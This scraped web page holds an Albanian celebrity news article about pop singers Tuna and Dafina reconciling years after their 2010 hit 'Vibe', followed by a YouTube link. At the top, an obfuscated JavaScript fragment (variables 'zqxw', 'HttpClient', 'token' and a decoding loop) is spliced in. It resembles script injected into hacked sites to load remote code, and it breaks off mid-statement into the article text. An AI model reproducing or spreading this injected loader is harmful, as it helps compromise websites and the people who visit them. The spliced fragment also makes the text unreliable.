;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja pse u pajtuan Tuna dhe Dafina pas shtatë vitesh

By

Bashkë arritën që në 2010-tën të krijojnë një prej hiteve të padiskutueshme në diskografinë moderne shqiptare. ‘Vibe’ nga Dafina, Tuna dhe 2po2 vazhdon akoma të mbahet mend e të dëgjohet por ndryshe prej krijimut muzikor, për vite të tëra më nuk dëgjuam për shoqërinë e dy vajzave.

Jo shumë kohë pas bashkëpunimit, për arsye të paqarta e të shoqëruara me dhjetëra spekulime, Dafina dhe Tuna i prishën punët mes vete. Në media, në 2012-tën kishin dalur edhe përgjime telefonike ku Dafina vinte në dilemë talentin e Tunës dhe e quante atë dyfytyrëshe.

Se gjërat nuk ishin ç’tensionuar, u kuptua vitin e kaluar kur emisioni Ëazzup në Klan Kosova transmetoi një sekuencë që shfaqte Tunën teksa ‘zhduk’ pjesën e refrenit nga Dafina duke e modifikuar në version të saj ‘Vibe’-in për koncerte.

Megjithatë, edhe relacioni aspak miqësor mes dy prej pop-këngëtareve më të suksesshme duket që fatmirësisht i takon tashmë të kaluarës!

Kjo është lënë të kuptohet nga zhvillimet e fundit dhe sinjalet nga krijueset e hitit ‘Vibe’.

Dy këngëtaret kanë filluar ta ndjekin njëra-tjetrën në rrjete sociale duke mos shtrënguar dorën edhe për pëlqime në fotografitë më të reja të Tunës e cila në pak ditë pritet të bëhet nënë.

Por pse u pajtuan vajzat?! Kush e bëri hapin e parë dhe në bazë të çfarë vendimi?!

Detajet ua sjell kronika e mëposhtme.

https://www.youtube.com/watch?v=FX7v6gVQab0

Artikuj të ngjashëm